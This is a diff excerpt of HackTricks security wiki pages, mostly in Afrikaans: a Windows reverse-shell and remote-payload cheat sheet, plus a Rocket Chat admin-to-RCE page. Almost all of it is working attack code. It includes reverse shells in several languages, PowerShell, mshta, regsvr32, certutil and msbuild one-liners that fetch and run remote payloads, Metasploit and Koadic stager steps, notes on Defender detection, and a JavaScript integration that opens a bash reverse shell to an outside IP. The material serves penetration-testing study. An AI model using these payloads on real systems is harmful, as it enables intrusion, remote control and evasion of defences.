uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
## Python
|
||||
```bash
|
||||
#Windows
|
||||
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||||
```
|
||||
## Perl
|
||||
```bash
|
||||
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
## Ruby
|
||||
```bash
|
||||
#Windows
|
||||
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
## Lua
|
||||
```bash
|
||||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
## OpenSSH
|
||||
|
||||
Aanvaller (Kali)
|
||||
```bash
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||||
```
|
||||
Slachtoffer
|
||||
```bash
|
||||
#Linux
|
||||
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
|
||||
#Windows
|
||||
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
```
|
||||
## Powershell
|
||||
```bash
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||||
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
|
||||
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
|
||||
```
|
||||
Proses wat netwerkoproep uitvoer: **powershell.exe**\
|
||||
Payload op skyf geskryf: **NEE** (_ten minste nêrens waar ek met procmon kon vind!_)
|
||||
```bash
|
||||
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
|
||||
```
|
||||
Proses wat netwerkoproep uitvoer: **svchost.exe**\
|
||||
Payload op skyf geskryf: **WebDAV-kliënt plaaslike kas**
|
||||
|
||||
**Een-liner:**
|
||||
```bash
|
||||
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
**Kry meer inligting oor verskillende Powershell-shelle aan die einde van hierdie dokument**
|
||||
|
||||
## Mshta
|
||||
|
||||
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
|
||||
```
|
||||
|
||||
```bash
|
||||
mshta http://webserver/payload.hta
|
||||
```
|
||||
|
||||
```bash
|
||||
mshta \\webdavserver\folder\payload.hta
|
||||
```
|
||||
#### **Voorbeeld van hta-psh omgekeerde skulp (gebruik hta om PS agterdeur af te laai en uit te voer)**
|
||||
```xml
|
||||
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
|
||||
```
|
||||
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager hta**
|
||||
|
||||
#### hta voorbeeld
|
||||
|
||||
[**Van hier**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
|
||||
```xml
|
||||
<html>
|
||||
<head>
|
||||
<HTA:APPLICATION ID="HelloExample">
|
||||
<script language="jscript">
|
||||
var c = "cmd.exe /c calc.exe";
|
||||
new ActiveXObject('WScript.Shell').Run(c);
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<script>self.close();</script>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
#### **mshta - sct**
|
||||
|
||||
[**Van hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||||
```xml
|
||||
<?XML version="1.0"?>
|
||||
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
|
||||
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
|
||||
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
|
||||
<scriptlet>
|
||||
<public>
|
||||
</public>
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]>
|
||||
</script>
|
||||
</scriptlet>
|
||||
```
|
||||
#### **Mshta - Metasploit**
|
||||
```bash
|
||||
use exploit/windows/misc/hta_server
|
||||
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
|
||||
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
|
||||
msf exploit(windows/misc/hta_server) > exploit
|
||||
```
|
||||
|
||||
```bash
|
||||
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
|
||||
```
|
||||
**Gevind deur verdediger**
|
||||
|
||||
|
||||
|
||||
|
||||
## **Rundll32**
|
||||
|
||||
[**Dll hello world voorbeeld**](https://github.com/carterjones/hello-world-dll)
|
||||
|
||||
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
||||
```
|
||||
|
||||
```bash
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
|
||||
```
|
||||
**Gevind deur verdediger**
|
||||
|
||||
**Rundll32 - sct**
|
||||
|
||||
[**Van hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||||
```xml
|
||||
<?XML version="1.0"?>
|
||||
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
|
||||
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
|
||||
<scriptlet>
|
||||
<public>
|
||||
</public>
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]>
|
||||
</script>
|
||||
</scriptlet>
|
||||
```
|
||||
#### **Rundll32 - Metasploit**
|
||||
```bash
|
||||
use windows/smb/smb_delivery
|
||||
run
|
||||
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
|
||||
```
|
||||
**Rundll32 - Koadic**
|
||||
```bash
|
||||
use stager/js/rundll32_js
|
||||
set SRVHOST 192.168.1.107
|
||||
set ENDPOINT sales
|
||||
run
|
||||
#Koadic will tell you what you need to execute inside the victim, it will be something like:
|
||||
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
|
||||
```
|
||||
## Regsvr32
|
||||
|
||||
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
||||
```
|
||||
|
||||
```
|
||||
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
||||
```
|
||||
**Gedig deur verdediger**
|
||||
|
||||
#### Regsvr32 -sct
|
||||
|
||||
[**Van hier**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||||
```markup
|
||||
<?XML version="1.0"?>
|
||||
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
|
||||
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
|
||||
<scriptlet>
|
||||
<registration
|
||||
progid="PoC"
|
||||
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
</scriptlet>
|
||||
```
|
||||
#### **Regsvr32 - Metasploit**
|
||||
```bash
|
||||
use multi/script/web_delivery
|
||||
set target 3
|
||||
set payload windows/meterpreter/reverse/tcp
|
||||
set lhost 10.2.0.5
|
||||
run
|
||||
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
|
||||
```
|
||||
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager regsvr**
|
||||
|
||||
## Certutil
|
||||
|
||||
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
Laai 'n B64dll af, dekodeer dit en voer dit uit.
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
|
||||
```
|
||||
Laai 'n B64exe af, dekodeer dit en voer dit uit.
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
|
||||
```
|
||||
**Gevind deur verdediger**
|
||||
|
||||
|
||||
## **Cscript/Wscript**
|
||||
```bash
|
||||
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
|
||||
```
|
||||
**Cscript - Metasploit**
|
||||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
|
||||
```
|
||||
**Gevind deur verdediger**
|
||||
|
||||
## PS-Bat
|
||||
```bash
|
||||
\\webdavserver\folder\batchfile.bat
|
||||
```
|
||||
Proses wat netwerkoproep uitvoer: **svchost.exe**\
|
||||
Payload op skyf geskryf: **WebDAV-kliënt plaaslike kas**
|
||||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
|
||||
impacket-smbserver -smb2support kali `pwd`
|
||||
```
|
||||
|
||||
```bash
|
||||
\\10.8.0.3\kali\shell.bat
|
||||
```
|
||||
**Gevind deur verdediger**
|
||||
|
||||
## **MSIExec**
|
||||
|
||||
Aanvaller
|
||||
```
|
||||
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
|
||||
python -m SimpleHTTPServer 80
|
||||
```
|
||||
Slachtoffer:
|
||||
```
|
||||
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
|
||||
```
|
||||
**Gevind**
|
||||
|
||||
## **Wmic**
|
||||
|
||||
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
wmic os get /format:"https://webserver/payload.xsl"
|
||||
```
|
||||
Voorbeeld xsl-lêer [van hier](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
|
||||
```xml
|
||||
<?xml version='1.0'?>
|
||||
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
|
||||
<output method="text"/>
|
||||
<ms:script implements-prefix="user" language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
|
||||
]]>
|
||||
</ms:script>
|
||||
</stylesheet>
|
||||
```
|
||||
**Nie gedetecteer nie**
|
||||
|
||||
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager wmic**
|
||||
|
||||
## Msbuild
|
||||
|
||||
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```
|
||||
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
|
||||
```
|
||||
U kan hierdie tegniek gebruik om toepassingswitlys en Powershell.exe-beperkings te omseil. U sal met 'n PS-skal gevra word.\
|
||||
Laai net dit af en voer dit uit: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
|
||||
```
|
||||
**Nie gedetecteer nie**
|
||||
|
||||
## **CSC**
|
||||
|
||||
Compileer C# kode op die slagoffer masjien.
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
|
||||
```
|
||||
You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
|
||||
|
||||
**Nie gedetecteer nie**
|
||||
|
||||
## **Regasm/Regsvc**
|
||||
|
||||
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
|
||||
```
|
||||
**Ek het dit nie probeer nie**
|
||||
|
||||
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
|
||||
|
||||
## Odbcconf
|
||||
|
||||
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
||||
```
|
||||
**Ek het dit nie probeer nie**
|
||||
|
||||
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
|
||||
|
||||
## Powershell Skale
|
||||
|
||||
### PS-Nishang
|
||||
|
||||
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||||
|
||||
In die **Skale** gids, is daar 'n klomp verskillende skale. Om Invoke-_PowerShellTcp.ps1_ te aflaai en uit te voer, maak 'n kopie van die skrif en voeg by die einde van die lêer:
|
||||
```
|
||||
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
|
||||
```
|
||||
Begin om die skrip op 'n webbediener te bedien en voer dit aan die slagoffer se kant uit:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
|
||||
```
|
||||
Defender detecteer dit nie as kwaadwillige kode nie (nog, 3/04/2019).
|
||||
|
||||
**TODO: Kontroleer ander nishang shells**
|
||||
|
||||
### **PS-Powercat**
|
||||
|
||||
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
|
||||
|
||||
Laai af, begin 'n webbediener, begin die luisteraar, en voer dit op die slagoffer se kant uit:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
Defender detecteer dit nie as kwaadwillige kode nie (nog, 3/04/2019).
|
||||
|
||||
**Ander opsies wat deur powercat aangebied word:**
|
||||
|
||||
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
|
||||
```
|
||||
Serve a cmd Shell:
|
||||
powercat -l -p 443 -e cmd
|
||||
Send a cmd Shell:
|
||||
powercat -c 10.1.1.1 -p 443 -e cmd
|
||||
Send a powershell:
|
||||
powercat -c 10.1.1.1 -p 443 -ep
|
||||
Send a powershell UDP:
|
||||
powercat -c 10.1.1.1 -p 443 -ep -u
|
||||
TCP Listener to TCP Client Relay:
|
||||
powercat -l -p 8000 -r tcp:10.1.1.16:443
|
||||
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
|
||||
powercat -c 10.1.1.15 -p 443 -e cmd -g
|
||||
Start A Persistent Server That Serves a File:
|
||||
powercat -l -p 443 -i C:\inputfile -rep
|
||||
```
|
||||
### Empire
|
||||
|
||||
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
|
||||
|
||||
Skep 'n powershell-lanser, stoor dit in 'n lêer en laai dit af en voer dit uit.
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
**Gedig as kwaadwillige kode**
|
||||
|
||||
### MSF-Unicorn
|
||||
|
||||
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
|
||||
|
||||
Skep 'n powershell weergawe van metasploit agterdeur met behulp van unicorn
|
||||
```
|
||||
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
|
||||
```
|
||||
Begin msfconsole met die geskepte hulpbron:
|
||||
```
|
||||
msfconsole -r unicorn.rc
|
||||
```
|
||||
Begin 'n webbediener wat die _powershell\_attack.txt_ lêer bedien en voer uit in die slagoffer:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
|
||||
```
|
||||
**Gedig as kwaadwillige kode**
|
||||
|
||||
## Meer
|
||||
|
||||
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS-konsol met 'n paar offensiewe PS-modules vooraf gelaai (gecyfer)\
|
||||
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9)[\
|
||||
WinPWN](https://github.com/SecureThisShit/WinPwn) PS-konsol met 'n paar offensiewe PS-modules en proxy-detektering (IEX)
|
||||
|
||||
## Verwysings
|
||||
|
||||
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
||||
* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
|
||||
* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
|
||||
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
|
||||
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
**Probeer Hard Sekuriteitsgroep**
|
||||
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Ondersteun HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
|
@ -1,8 +1,8 @@
|
|||
# Rocket Chat
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Leer & oefen AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -14,7 +14,6 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
|
|||
|
||||
</details>
|
||||
{% endhint %}
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -29,7 +28,7 @@ As jy admin binne Rocket Chat is, kan jy RCE kry.
|
|||
|
||||
<figure><img src="../../.gitbook/assets/image (266).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* Volgens die [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), gebruik albei ES2015 / ECMAScript 6 ([basies JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) om die data te verwerk. So kom ons kry 'n [rev shell vir javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) soos:
|
||||
* Volgens die [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), gebruik albei ES2015 / ECMAScript 6 ([basies JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) om die data te verwerk. So kom ons kry 'n [rev shell vir javascript](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) soos:
|
||||
```javascript
|
||||
const require = console.log.constructor('return process.mainModule.require')();
|
||||
const { exec } = require('child_process');
|
||||
|
@ -48,14 +47,15 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
|
|||
|
||||
<figure><img src="../../.gitbook/assets/image (937).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* Bel dit met curl en jy behoort die rev shell te ontvang
|
||||
* Roep dit aan met curl en jy behoort die rev shell te ontvang
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Leer & oefen AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -67,5 +67,3 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
|
|||
|
||||
</details>
|
||||
{% endhint %}
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
Loading…
Reference in a new issue